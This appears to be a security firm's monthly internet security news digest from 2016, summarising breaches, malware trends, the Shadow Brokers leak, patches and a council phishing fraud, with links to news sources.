  • UK-based smartphone news and reviews forum MoDaCo has confirmed a breach of 880 000 member usernames, passwords, email and IP addresses. The breach itself is believed to have occurred in January 2016 through the use of a compromised administrator account. Although a lot of information has been leaked, MoDaCo says passwords were stored using the Blowfish cipher.”Security researcher Troy Hunt, who runs ‘Have I Been Pwnd?’, says that 70 percent of the email addresses exposed in this breach were already contained in data batches from previous breaches of other online services.” – (Zeljka Zorz – helpnetsecurity.com, 2016)

Read more on Help Net Security website

 

Other

  • Investigative journalist Brian Krebs has been the target of one of the largest Distributed Denial of Service (DDoS) attacks ever recorded, with a whopping 620Gbps. Brian Krebs’s website krebsonsecurity.com had DDoS protection provided by Akamai, who were able to absorb the DDoS attack, but have since dropped Brian Kerbs as a client. The website is now protected by the Google Project Shield initiative, a free service for select journalists to protect from online censorship.

Read more on Krebs on Security website

  • Threat actor ‘The Shadow Brokers’ have acquired stolen NSA hacking tools and are attempting to sell them on the black market. These tools have been confirmed to be NSA tools via an unnamed source within the FBI investigation group currently investigating the incident. It is believed these tools were stolen when these tools were left on a remote staging server 3 years ago, that has since been compromised.So far there has been reportedly little interest in buying these tools, likely due to the NSA currently looking for evidence that the tools are being used, and the fear that the use of these tools could garner too much attention from the NSA.

Read more on Naked Security website

  • There has been an increase in technology development into sandbox-aware malware. There have been observed cases where a document based macro will search a system for the presence of word documents in order to detect if it is running in a sandbox environment or a real user’s system. As a result of this if the script did not detect more than 2-word documents on the host the script would terminate. However, where more than 2-word documents are identified the macro would call back to download its desired malware for execution.These advancements are showing a growing requirement to tailor sandbox environments to be a more realistic snapshot of the kinds of machines that malware target.

https://it.slashdot.org/story/16/09/24/1834249/malware-evades-detection-by-counting-word-documents
https://threatpost.com/malware-evades-detection-with-novel-technique/120787/

August 2016 Internet Security Report


August 2016 was an overall interesting month for cyber security with the annual conferences taking place in America, the Census providing some interesting lessons learnt and discussion; and the Olympics creating an interesting platform for malicious actors. In addition to this, the industry as a whole experienced a diverse range of new threats, breaches and success stories.

Threats

  • Sophos have identified a trend where shortcut files (.LNK) have been used to hide ransomware downloaders. By using a shortcut file malicious actors are able to better mask malware by making the link appear benign. Users are reminded to always be wary of any links or attachments they receive in emails and when in doubt report it or have an extra opinion.

https://nakedsecurity.sophos.com/2016/08/03/beware-of-ransomware-hiding-in-shortcuts/

  • US-based researcher Elie Bursztein presented his findings of a social experiment conducted at a US university where a number of USBs containing ‘phone home’ capabilities were dropped. Surprisingly 48% of the 297 USBs dropped were plugged into a computer and the phone home capabilities activated. When surveyed the majority of people who activated the USBs claimed to have been trying to return the USB to its rightful owner. This study highlights the level of trust that people have for USB devices and although the USBs used in the study were not actually malicious. It is important to always be wary as to the origin of a USB device, especially if they have been found or are free.

https://threatpost.com/never-trust-a-found-usb-drive-black-hat-demo-shows-why/119653/

  • It is believed that as a result of the increase in attention created by the Olympics has resulted in an increase in banking malware in Brazil. This is a good reminder as to how current events both globally and domestically can be used by malicious actors as a means to increase their chances in successful social engineering attacks.

http://www.infosecurity-magazine.com/news/olympics-panda-zeus-chomps-into/
http://www.infosecurity-magazine.com/news/brazil-hit-with-a-second-banking/

  • A new banking Trojan kit has been discovered being sold as a service that goes by the name of Scylex. This is likely to fill the gap in the malware as a service void created by the downfall of previously dominate trojans such as Zeus/SpyEye, Citadel and ZeroAccess. It is still unsure as to how operational or effective this new service is. However, if it is able to deliver on its promises it has the potential to wreck mayhem on financial institutions.

http://www.securitynewspaper.com/2016/08/13/new-scylex-banking-trojan-kit-surfaces-dark-web/
http://www.infosecurity-magazine.com/news/meet-scylex-the-new-financial/

Breaches

  • Accountancy software providers The Sage Group experienced an incident in which a user used valid internal credentials to access a number of sensitive customer files. Unfortunately, as this is still an ongoing investigation it is uncertain as to the scale of the breach, however, there have been reports of an arrest in regards to this breach resulting in fraud charges. This incident highlights the reality of the risk that insider threats can pose to an organisation.

http://www.theregister.co.uk/2016/08/15/sage_breached_in_apparent_insider_attack/
http://www.welivesecurity.com/2016/08/15/high-profile-data-breach-sage-draws-attention-internal-threats/
http://www.infosecurity-magazine.com/news/sage-employee-arrested-data-breach/

  • This month 20 US hotels were identified as being infected with Point-of-Sale malware designed to harvest credit card information. These attacks continue to highlight how all devices on a network need to be considered and assessed from a security standpoint.With malicious actors becoming more creative and aware of the weakest points of an organisations information’s systems it is important to be aware of all hosts and their business importance within the scope of a network and to ensure that appropriate security and risk management controls are in place and adhered to.

http://www.zdnet.com/article/20-top-us-hotels-hit-by-fresh-malware-attacks/
http://www.theregister.co.uk/2016/08/15/pos_malware_stings_20_us_hotels/

Patches and Updates

  • Microsoft Office patch MS16-099 resolved some issues that would allow remote code execution if a user opened a specially crafted document. These continue to be an issue, with common phishing emails claiming to be an invoice or a resume likely to make use of these exploits. Ensure these patches are deployed as soon as possible.

https://technet.microsoft.com/en-us/library/security/MS16-099

  • In one of the most interesting security news events in recent history tools from the notorious ‘Equation Group’ which has been previously attributed to being an NSA backed threat actor were put up for auction in an underground forum by an actor known as ‘The Shadow Brokers’. The Shadow Broker initially floated the price of the tools to be 1 million bitcoin (roughly 580 million USD) which naturally drew a lot of suspicion and skepticism as to the legitimacy of the claim.As time continued and the tools up for auction were slowly released for proof of concept. The reality of the situation bean to set in with a number of large companies validating the legitimacy of the tools and exploits and subsequently releasing urgent patches to resolve the issue. Some of the companies who have released updates and comments include:

Cisco – https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
– FortiNet – http://fortiguard.com/advisory/FG-IR-16-023
– Juniper – https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10605&actp=search

Other

  • Project Sauron also known as Strider is a high-level modular cyber-espionage platform believed to be part of an Advanced Persistent Threat (APT) campaign that has been documented in some detail in the below link. This cyber-espionage platform has been found to be attacking high profile targets in Government, Finance, Military, Telecommunications, and Scientific Research.

https://securelist.com/analysis/publications/75533/faq-the-projectsauron-apt/

  • Brisbane City Council have lost $450,000 AUD in a sophisticated spear-phishing scam where scammers pretending to be a legitimate professional services provider used a series of fake invoices to fraud the Brisbane City Council of just over $450,000 AUD thought 9 payments between the 13ht of July and the 16th of August. Unfortunately the likelihood of recovering the funds are low and law enforcement is currently pursuing the matter. Deloitte have also been engaged to conduct an investigation into the incident.Sadly this type of fraud is a constant threat and is most effective where financial payment controls and processes are less stringent or existing processes are being bypassed by staff. By ensuring outgoing payments are peer reviewed and structural separation of duties it is possible to better mitigate the risk of these scams being successful.

http://www.theregister.co.uk/2016/08/16/brisbane_councillors_lose_500k_to_scammers/
http://www.abc.net.au/news/2016-08-16/brisbane-city-council-loses-450k-to-scammers/7746812